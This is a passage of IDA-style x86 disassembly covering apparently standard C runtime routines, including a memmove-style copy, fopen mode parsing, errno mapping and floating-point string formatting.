sub_418EB7 endp
; =============== S U B R O U T I N E =======================================
sub_418F3B proc near ; DATA XREF: .rdata:stru_429010�o
mov ebx, [ebp+8]
sub_418F3B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_418F3E proc near ; CODE XREF: sub_418EB7+7A�p
push ebx
call sub_41CBFF
pop ecx
retn
sub_418F3E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_418EB7
loc_418F46: ; CODE XREF: sub_418EB7+15�j
; sub_418EB7+35�j
call sub_419430
mov dword ptr [eax], 9
call sub_419439
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_418F5C: ; CODE XREF: sub_418EB7+82�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_418EB7
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418F70 proc near ; CODE XREF: sub_4148B5+5F�p
; sub_4149EA+A8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_418F90
cmp edi, eax
jb loc_41910C
loc_418F90: ; CODE XREF: sub_418F70+16�j
test edi, 3
jnz short loc_418FAC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_418FCC
rep movsd
jmp ds:off_4190BC[edx*4]
; ---------------------------------------------------------------------------
loc_418FAC: ; CODE XREF: sub_418F70+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_418FC4
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_418FCC+4[eax*4]
; ---------------------------------------------------------------------------
loc_418FC4: ; CODE XREF: sub_418F70+46�j
jmp dword ptr ds:loc_4190CC[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_418FCC: ; CODE XREF: sub_418F70+31�j
; sub_418F70+8E�j ...
jmp ds:off_419050[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_418FDC+4
dd offset loc_41900C
; ---------------------------------------------------------------------------
loc_418FDC: ; DATA XREF: sub_418F70+64�o
xor [eax-2EDCFFBFh], dl
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_418FCC
rep movsd
jmp ds:off_4190BC[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41900C: ; DATA XREF: sub_418F70+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_418FCC
rep movsd
jmp ds:off_4190BC[edx*4]
; ---------------------------------------------------------------------------
align 10h
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_418FCC
rep movsd
jmp ds:off_4190BC[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_419050 dd offset loc_4190B3 ; DATA XREF: sub_418F70:loc_418FCC�r
dd offset loc_4190A0
dd offset loc_419098
dd offset loc_419090
dd offset loc_419088
dd offset loc_419080
dd offset loc_419078
dd offset loc_419070
; ---------------------------------------------------------------------------
loc_419070: ; CODE XREF: sub_418F70:loc_418FCC�j
; DATA XREF: sub_418F70+FC�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_419078: ; CODE XREF: sub_418F70:loc_418FCC�j
; DATA XREF: sub_418F70+F8�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_419080: ; CODE XREF: sub_418F70:loc_418FCC�j
; DATA XREF: sub_418F70+F4�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_419088: ; CODE XREF: sub_418F70:loc_418FCC�j
; DATA XREF: sub_418F70+F0�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_419090: ; CODE XREF: sub_418F70:loc_418FCC�j
; DATA XREF: sub_418F70+EC�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_419098: ; CODE XREF: sub_418F70:loc_418FCC�j
; DATA XREF: sub_418F70+E8�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4190A0: ; CODE XREF: sub_418F70:loc_418FCC�j
; DATA XREF: sub_418F70+E4�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4190B3: ; CODE XREF: sub_418F70:loc_418FCC�j
; DATA XREF: sub_418F70:off_419050�o
jmp ds:off_4190BC[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4190BC dd offset loc_4190CC ; DATA XREF: sub_418F70+35�r
; sub_418F70+92�r ...
dd offset loc_4190D4
dd offset loc_4190E0
dd offset loc_4190F4
; ---------------------------------------------------------------------------
loc_4190CC: ; CODE XREF: sub_418F70+35�j
; sub_418F70+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4190D4: ; CODE XREF: sub_418F70+35�j
; sub_418F70+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4190E0: ; CODE XREF: sub_418F70+35�j
; sub_418F70+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4190F4: ; CODE XREF: sub_418F70+35�j
; sub_418F70+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41910C: ; CODE XREF: sub_418F70+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_419140
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_419134
std
rep movsd
cld
jmp ds:off_419258[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_419134: ; CODE XREF: sub_418F70+1B5�j
; sub_418F70+210�j ...
neg ecx
jmp ds:off_419208[ecx*4]
; ---------------------------------------------------------------------------
align 10h
loc_419140: ; CODE XREF: sub_418F70+1AA�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_419158
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_419158+4[eax*4]
; ---------------------------------------------------------------------------
loc_419158: ; CODE XREF: sub_418F70+1DA�j
; DATA XREF: sub_418F70+1E1�r
jmp ds:off_419258[ecx*4]
; ---------------------------------------------------------------------------
align 10h
dd offset loc_41916C
dd offset loc_419190
dd offset loc_4191B8
; ---------------------------------------------------------------------------
loc_41916C: ; DATA XREF: sub_418F70+1F0�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_419134
std
rep movsd
cld
jmp ds:off_419258[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_419190: ; DATA XREF: sub_418F70+1F4�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_419134
std
rep movsd
cld
jmp ds:off_419258[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_4191B8: ; DATA XREF: sub_418F70+1F8�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_419134
std
rep movsd
cld
jmp ds:off_419258[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41920C
dd offset loc_419214
dd offset loc_41921C
dd offset loc_419224
dd offset loc_41922C
dd offset loc_419234
dd offset loc_41923C
off_419208 dd offset loc_41924F ; DATA XREF: sub_418F70+1C6�r
; ---------------------------------------------------------------------------
loc_41920C: ; DATA XREF: sub_418F70+27C�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_419214: ; DATA XREF: sub_418F70+280�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_41921C: ; DATA XREF: sub_418F70+284�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_419224: ; DATA XREF: sub_418F70+288�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_41922C: ; DATA XREF: sub_418F70+28C�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_419234: ; DATA XREF: sub_418F70+290�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_41923C: ; DATA XREF: sub_418F70+294�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41924F: ; CODE XREF: sub_418F70+1C6�j
; DATA XREF: sub_418F70:off_419208�o
jmp ds:off_419258[edx*4]
; ---------------------------------------------------------------------------
align 4
off_419258 dd offset loc_419268 ; DATA XREF: sub_418F70+1BB�r
; sub_418F70:loc_419158�r ...
dd offset loc_419270
dd offset loc_419280
dd offset loc_419294
; ---------------------------------------------------------------------------
loc_419268: ; CODE XREF: sub_418F70+1BB�j
; sub_418F70:loc_419158�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_419270: ; CODE XREF: sub_418F70+1BB�j
; sub_418F70:loc_419158�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_419280: ; CODE XREF: sub_418F70+1BB�j
; sub_418F70:loc_419158�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_419294: ; CODE XREF: sub_418F70+1BB�j
; sub_418F70:loc_419158�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_418F70 endp
; =============== S U B R O U T I N E =======================================
sub_4192AD proc near ; CODE XREF: sub_4149EA+150�p
; sub_4149EA+19B�p ...
arg_0 = dword ptr 4
mov eax, dword_47C378
test eax, eax
jz short loc_4192C5
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_4192C5
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4192C5: ; CODE XREF: sub_4192AD+7�j
; sub_4192AD+12�j
xor eax, eax
retn
sub_4192AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4192C8 proc near ; CODE XREF: sub_414B97+35�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, dword_47C520
push edi
mov edi, [ebp+arg_4]
mov al, [edi]
xor ebx, ebx
cmp al, 61h
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
jz short loc_419301
cmp al, 72h
jz short loc_4192FA
cmp al, 77h
jnz loc_41940D
mov ecx, 301h
jmp short loc_419306
; ---------------------------------------------------------------------------
loc_4192FA: ; CODE XREF: sub_4192C8+21�j
xor ecx, ecx
or esi, 1
jmp short loc_419309
; ---------------------------------------------------------------------------
loc_419301: ; CODE XREF: sub_4192C8+1D�j
mov ecx, 109h
loc_419306: ; CODE XREF: sub_4192C8+30�j
or esi, 2
loc_419309: ; CODE XREF: sub_4192C8+37�j
xor edx, edx
inc edx
jmp loc_4193E8
; ---------------------------------------------------------------------------
loc_419311: ; CODE XREF: sub_4192C8+125�j
cmp edx, ebx
jz loc_4193F3
movsx eax, al
cmp eax, 54h
jg short loc_419392
jz short loc_419385
sub eax, 2Bh
jz short loc_41936F
sub eax, 19h
jz short loc_419365
sub eax, 0Eh
jz short loc_419351
dec eax
jnz loc_4193CA
cmp [ebp+var_4], ebx
jnz loc_4193CA
mov [ebp+var_4], 1
or ecx, 20h
jmp loc_4193E8
; ---------------------------------------------------------------------------
loc_419351: ; CODE XREF: sub_4192C8+68�j
cmp [ebp+var_4], ebx
jnz short loc_4193CA
mov [ebp+var_4], 1
or ecx, 10h
jmp loc_4193E8
; ---------------------------------------------------------------------------
loc_419365: ; CODE XREF: sub_4192C8+63�j
test cl, 40h
jnz short loc_4193CA
or ecx, 40h
jmp short loc_4193E8
; ---------------------------------------------------------------------------
loc_41936F: ; CODE XREF: sub_4192C8+5E�j
test cl, 2
jnz short loc_4193CA
and ecx, 0FFFFFFFEh
and esi, 0FFFFFFFCh
or ecx, 2
or esi, 80h
jmp short loc_4193E8
; ---------------------------------------------------------------------------
loc_419385: ; CODE XREF: sub_4192C8+59�j
mov eax, 1000h
test ecx, eax
jnz short loc_4193CA
or ecx, eax
jmp short loc_4193E8
; ---------------------------------------------------------------------------
loc_419392: ; CODE XREF: sub_4192C8+57�j
sub eax, 62h
jz short loc_4193DD
dec eax
jz short loc_4193C5
sub eax, 0Bh
jz short loc_4193B1
sub eax, 6
jnz short loc_4193CA
test ch, 0C0h
jnz short loc_4193CA
or ecx, 4000h
jmp short loc_4193E8
; ---------------------------------------------------------------------------
loc_4193B1: ; CODE XREF: sub_4192C8+D5�j
cmp [ebp+var_8], ebx
jnz short loc_4193CA
mov [ebp+var_8], 1
and esi, 0FFFFBFFFh
jmp short loc_4193E8
; ---------------------------------------------------------------------------
loc_4193C5: ; CODE XREF: sub_4192C8+D0�j
cmp [ebp+var_8], ebx
jz short loc_4193CE
loc_4193CA: ; CODE XREF: sub_4192C8+6B�j
; sub_4192C8+74�j ...
xor edx, edx
jmp short loc_4193E8
; ---------------------------------------------------------------------------
loc_4193CE: ; CODE XREF: sub_4192C8+100�j
mov [ebp+var_8], 1
or esi, 4000h
jmp short loc_4193E8
; ---------------------------------------------------------------------------
loc_4193DD: ; CODE XREF: sub_4192C8+CD�j
test ch, 0C0h
jnz short loc_4193CA
or ecx, 8000h
loc_4193E8: ; CODE XREF: sub_4192C8+44�j
; sub_4192C8+84�j ...
inc edi
mov al, [edi]
cmp al, bl
jnz loc_419311
loc_4193F3: ; CODE XREF: sub_4192C8+4B�j
push 1A4h
push [ebp+arg_8]
push ecx
push [ebp+arg_0]
call sub_41D674
mov ecx, eax
add esp, 10h
cmp ecx, ebx
jge short loc_419411
loc_41940D: ; CODE XREF: sub_4192C8+25�j
xor eax, eax
jmp short loc_41942B
; ---------------------------------------------------------------------------
loc_419411: ; CODE XREF: sub_4192C8+143�j
mov eax, [ebp+arg_C]
inc dword_47C220
mov [eax+0Ch], esi
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_41942B: ; CODE XREF: sub_4192C8+147�j
pop edi
pop esi
pop ebx
leave
retn
sub_4192C8 endp
; =============== S U B R O U T I N E =======================================
sub_419430 proc near ; CODE XREF: sub_414B97+18�p
; sub_414D44+2B�p ...
call sub_416C45
add eax, 8
retn
sub_419430 endp
; =============== S U B R O U T I N E =======================================
sub_419439 proc near ; CODE XREF: sub_414D44+36�p
; sub_417B3C+8A�p ...
call sub_416C45
add eax, 0Ch
retn
sub_419439 endp
; =============== S U B R O U T I N E =======================================
sub_419442 proc near ; CODE XREF: sub_414D44+16�p
; sub_415AB5+1D�p ...
arg_0 = dword ptr 4
push esi
call sub_416C45
mov ecx, [esp+4+arg_0]
mov [eax+0Ch], ecx
xor esi, esi
loc_419451: ; CODE XREF: sub_419442+1C�j
cmp ecx, dword_42DD30[esi*8]
jz short loc_419478
inc esi
cmp esi, 2Dh
jb short loc_419451
cmp ecx, 13h
jb short loc_419489
cmp ecx, 24h
ja short loc_419489
call sub_416C45
mov dword ptr [eax+8], 0Dh
pop esi
retn
; ---------------------------------------------------------------------------
loc_419478: ; CODE XREF: sub_419442+16�j
call sub_416C45
mov ecx, dword_42DD34[esi*8]
mov [eax+8], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_419489: ; CODE XREF: sub_419442+21�j
; sub_419442+26�j
cmp ecx, 0BCh
jb short loc_4194A7
cmp ecx, 0CAh
ja short loc_4194A7
call sub_416C45
mov dword ptr [eax+8], 8
pop esi
retn
; ---------------------------------------------------------------------------
loc_4194A7: ; CODE XREF: sub_419442+4D�j
; sub_419442+55�j
call sub_416C45
mov dword ptr [eax+8], 16h
pop esi
retn
sub_419442 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4194B5 proc near ; CODE XREF: sub_414B97+C�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset stru_429020
call __SEH_prolog
xor ebx, ebx
xor edi, edi
mov [ebp+var_1C], edi
push 1
call sub_4180B5
pop ecx
mov [ebp+ms_exc.disabled], ebx
xor esi, esi
loc_4194D5: ; CODE XREF: sub_4194B5+85�j
mov [ebp+var_20], esi
cmp esi, dword_47D9C0
jge loc_4195A4
mov eax, dword_47C9A4
mov eax, [eax+esi*4]
cmp eax, ebx
jz short loc_419540
test byte ptr [eax+0Ch], 83h
jnz short loc_419539
cmp esi, 2
jle short loc_419512
cmp esi, 14h
jge short loc_419512
lea eax, [esi+10h]
push eax
call sub_418036
pop ecx
test eax, eax
jz loc_4195A4
loc_419512: ; CODE XREF: sub_4194B5+44�j
; sub_4194B5+49�j
mov eax, dword_47C9A4
push dword ptr [eax+esi*4]
push esi
call sub_417E57
pop ecx
pop ecx
mov eax, dword_47C9A4
mov eax, [eax+esi*4]
test byte ptr [eax+0Ch], 83h
jz short loc_41953C
push eax
push esi
call sub_417EA9
pop ecx
pop ecx
loc_419539: ; CODE XREF: sub_4194B5+3F�j
inc esi
jmp short loc_4194D5
; ---------------------------------------------------------------------------
loc_41953C: ; CODE XREF: sub_4194B5+79�j
mov edi, eax
jmp short loc_4195A1
; ---------------------------------------------------------------------------
loc_419540: ; CODE XREF: sub_4194B5+39�j
shl esi, 2
push 38h
call sub_414CAD
pop ecx
mov ecx, dword_47C9A4
mov [esi+ecx], eax
mov eax, dword_47C9A4
mov eax, [esi+eax]
cmp eax, ebx
jz short loc_4195A4
push 0FA0h
add eax, 20h
push eax
call sub_41CFB8
pop ecx
pop ecx
test eax, eax
mov eax, dword_47C9A4
jnz short loc_41958C
push dword ptr [esi+eax]
call sub_414844
pop ecx
mov eax, dword_47C9A4
mov [esi+eax], ebx
jmp short loc_4195A4
; ---------------------------------------------------------------------------
loc_41958C: ; CODE XREF: sub_4194B5+C2�j
mov eax, [esi+eax]
add eax, 20h
push eax
call ds:dword_42001C ; RtlEnterCriticalSection
mov eax, dword_47C9A4
mov edi, [esi+eax]
loc_4195A1: ; CODE XREF: sub_4194B5+89�j
mov [ebp+var_1C], edi
loc_4195A4: ; CODE XREF: sub_4194B5+29�j
; sub_4194B5+57�j ...
cmp edi, ebx
jz short loc_4195BA
mov [edi+4], ebx
mov [edi+0Ch], ebx
mov [edi+8], ebx
mov [edi], ebx
mov [edi+1Ch], ebx
or dword ptr [edi+10h], 0FFFFFFFFh
loc_4195BA: ; CODE XREF: sub_4194B5+F1�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4195CE
mov eax, edi
call __SEH_epilog
retn
sub_4194B5 endp
; =============== S U B R O U T I N E =======================================
sub_4195CB proc near ; DATA XREF: .rdata:stru_429020�o
mov edi, [ebp-1Ch]
sub_4195CB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4195CE proc near ; CODE XREF: sub_4194B5+109�p
push 1
call sub_418021
pop ecx
retn
sub_4195CE endp
; =============== S U B R O U T I N E =======================================
sub_4195D7 proc near ; CODE XREF: sub_416492+459�p
; DATA XREF: sub_414CF5+1E�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
movsx eax, byte ptr [esi]
push eax
call sub_41540C
cmp eax, 65h
jmp short loc_4195F6
; ---------------------------------------------------------------------------
loc_4195EA: ; CODE XREF: sub_4195D7+20�j
inc esi
movsx eax, byte ptr [esi]
push eax
call sub_41C16B
test eax, eax
loc_4195F6: ; CODE XREF: sub_4195D7+11�j
pop ecx
jnz short loc_4195EA
mov al, [esi]
mov cl, byte_42E108
mov [esi], cl
inc esi
loc_419604: ; CODE XREF: sub_4195D7+38�j
mov cl, [esi]
mov [esi], al
mov al, cl
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_419604
pop esi
retn
sub_4195D7 endp
; =============== S U B R O U T I N E =======================================
sub_419613 proc near ; CODE XREF: sub_416492+46A�p
; DATA XREF: sub_414CF5+A�o ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push ebx
mov bl, byte_42E108
jmp short loc_419625
; ---------------------------------------------------------------------------
loc_419620: ; CODE XREF: sub_419613+16�j
cmp cl, bl
jz short loc_41962B
inc eax
loc_419625: ; CODE XREF: sub_419613+B�j
mov cl, [eax]
test cl, cl
jnz short loc_419620
loc_41962B: ; CODE XREF: sub_419613+F�j
mov cl, [eax]
inc eax
test cl, cl
jz short loc_41965C
jmp short loc_41963F
; ---------------------------------------------------------------------------
loc_419634: ; CODE XREF: sub_419613+30�j
cmp cl, 65h
jz short loc_419645
cmp cl, 45h
jz short loc_419645
inc eax
loc_41963F: ; CODE XREF: sub_419613+1F�j
mov cl, [eax]
test cl, cl
jnz short loc_419634
loc_419645: ; CODE XREF: sub_419613+24�j
; sub_419613+29�j
mov edx, eax
loc_419647: ; CODE XREF: sub_419613+38�j
dec eax
cmp byte ptr [eax], 30h
jz short loc_419647
cmp [eax], bl
jnz short loc_419652
dec eax
loc_419652: ; CODE XREF: sub_419613+3C�j
; sub_419613+47�j
mov cl, [edx]
inc eax
inc edx
test cl, cl
mov [eax], cl
jnz short loc_419652
loc_41965C: ; CODE XREF: sub_419613+1D�j
pop ebx
retn
sub_419613 endp
; =============== S U B R O U T I N E =======================================
sub_41965E proc near ; DATA XREF: sub_414CF5+28�o
; .data:off_42DEA8�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
fld qword ptr [eax]
fcomp ds:dbl_429030
fnstsw ax
test ah, 1
jnz short loc_419675
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_419675: ; CODE XREF: sub_41965E+11�j
xor eax, eax
retn
sub_41965E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419678 proc near ; CODE XREF: sub_416D3B+40D�p
; DATA XREF: sub_414CF5+14�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push [ebp+arg_8]
jz short loc_4196A1
lea eax, [ebp+var_8]
push eax
call sub_41D9ED
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+var_8]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
leave
retn
; ---------------------------------------------------------------------------
loc_4196A1: ; CODE XREF: sub_419678+C�j
lea eax, [ebp+arg_0]
push eax
call sub_41DA30
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
mov [eax], ecx
leave
retn
sub_419678 endp
; =============== S U B R O U T I N E =======================================
sub_4196B6 proc near ; CODE XREF: sub_4196D3+23�p
; sub_4197F5+45�p ...
test edi, edi
push esi
mov esi, eax
jz short loc_4196D1
push esi
call sub_4177F0
inc eax
push eax
push esi
add esi, edi
push esi
call sub_41D050
add esp, 10h
loc_4196D1: ; CODE XREF: sub_4196B6+5�j
pop esi
retn
sub_4196B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4196D3 proc near ; CODE XREF: sub_419781+5B�p
; sub_4198F9+88�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
push esi
mov esi, eax
jz short loc_4196FC
xor eax, eax
cmp [ebp+arg_0], eax
push edi
setnle al
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
mov edi, eax
add ecx, ebx
mov eax, ecx
call sub_4196B6
pop edi
loc_4196FC: ; CODE XREF: sub_4196D3+A�j
cmp dword ptr [esi], 2Dh
mov eax, ebx
jnz short loc_419709
mov byte ptr [ebx], 2Dh
lea eax, [ebx+1]
loc_419709: ; CODE XREF: sub_4196D3+2E�j
cmp [ebp+arg_0], 0
jle short loc_419720
lea ecx, [eax+1]
mov dl, [ecx]
mov [eax], dl
mov eax, ecx
mov cl, byte_42E108
mov [eax], cl
loc_419720: ; CODE XREF: sub_4196D3+3A�j
xor ecx, ecx
cmp [ebp+arg_8], cl
push offset dword_429038
setz cl
add ecx, eax
add ecx, [ebp+arg_0]
push ecx
call sub_419A70
cmp [ebp+arg_4], 0
pop ecx
pop ecx
mov ecx, eax
jz short loc_419745
mov byte ptr [ecx], 45h
loc_419745: ; CODE XREF: sub_4196D3+6D�j
mov eax, [esi+0Ch]
inc ecx
cmp byte ptr [eax], 30h
jz short loc_41977C
mov eax, [esi+4]
dec eax
jns short loc_419759
neg eax
mov byte ptr [ecx], 2Dh
loc_419759: ; CODE XREF: sub_4196D3+7F�j
inc ecx
cmp eax, 64h
jl short loc_419769
cdq
push 64h
pop esi
idiv esi
add [ecx], al
mov eax, edx
loc_419769: ; CODE XREF: sub_4196D3+8A�j
inc ecx
cmp eax, 0Ah
jl short loc_419779
cdq
push 0Ah
pop esi
idiv esi
add [ecx], al
mov eax, edx
loc_419779: ; CODE XREF: sub_4196D3+9A�j
add [ecx+1], al
loc_41977C: ; CODE XREF: sub_4196D3+79�j
mov eax, ebx
pop esi
pop ebp
retn
sub_4196D3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419781 proc near ; CODE XREF: sub_419999+47�p
var_2C = byte ptr -2Ch
var_14 = dword ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_42DEB8
xor eax, [ebp+4]
push ebx
mov [ebp+var_4], eax
push esi
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+4]
push dword ptr [eax]
call sub_41DBA4
mov esi, [ebp+arg_8]
mov ebx, [ebp+arg_4]
lea eax, [ebp+var_14]
push eax
lea eax, [esi+1]
push eax
xor eax, eax
cmp [ebp+var_14], 2Dh
mov edx, ebx
setz al
xor ecx, ecx
test esi, esi
setnle cl
add edx, eax
add ecx, edx
push ecx
call sub_41DA73
push 0
push [ebp+arg_C]
lea eax, [ebp+var_14]
push esi
call sub_4196D3
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 28h
pop esi
mov eax, ebx
pop ebx
call sub_41A026
leave
retn
sub_419781 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4197F5 proc near ; CODE XREF: sub_419891+4F�p
; sub_4198F9+75�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, eax
mov eax, [esi+4]
dec eax
cmp [ebp+arg_8], 0
push edi
jz short loc_419822
cmp eax, [ebp+arg_4]
jnz short loc_419822
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
add ecx, eax
add ecx, [ebp+arg_0]
mov eax, ecx
mov byte ptr [eax], 30h
and byte ptr [eax+1], 0
loc_419822: ; CODE XREF: sub_4197F5+10�j
; sub_4197F5+15�j
cmp dword ptr [esi], 2Dh
mov ebx, [ebp+arg_0]
jnz short loc_41982E
mov byte ptr [ebx], 2Dh
inc ebx
loc_41982E: ; CODE XREF: sub_4197F5+33�j
mov eax, [esi+4]
xor edi, edi
inc edi
test eax, eax
jg short loc_419845
mov eax, ebx
call sub_4196B6
mov byte ptr [ebx], 30h
inc ebx
jmp short loc_419847
; ---------------------------------------------------------------------------
loc_419845: ; CODE XREF: sub_4197F5+41�j
add ebx, eax
loc_419847: ; CODE XREF: sub_4197F5+4E�j
cmp [ebp+arg_4], 0
jle short loc_419889
mov eax, ebx
call sub_4196B6
mov al, byte_42E108
mov [ebx], al
mov esi, [esi+4]
inc ebx
test esi, esi
jge short loc_419889
neg esi
cmp [ebp+arg_8], 0
jnz short loc_419870
cmp [ebp+arg_4], esi
jl short loc_419873
loc_419870: ; CODE XREF: sub_4197F5+74�j
mov [ebp+arg_4], esi
loc_419873: ; CODE XREF: sub_4197F5+79�j
mov edi, [ebp+arg_4]
mov eax, ebx
call sub_4196B6
push edi
push 30h
push ebx
call sub_41C380
add esp, 0Ch
loc_419889: ; CODE XREF: sub_4197F5+56�j
; sub_4197F5+6C�j
mov eax, [ebp+arg_0]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4197F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
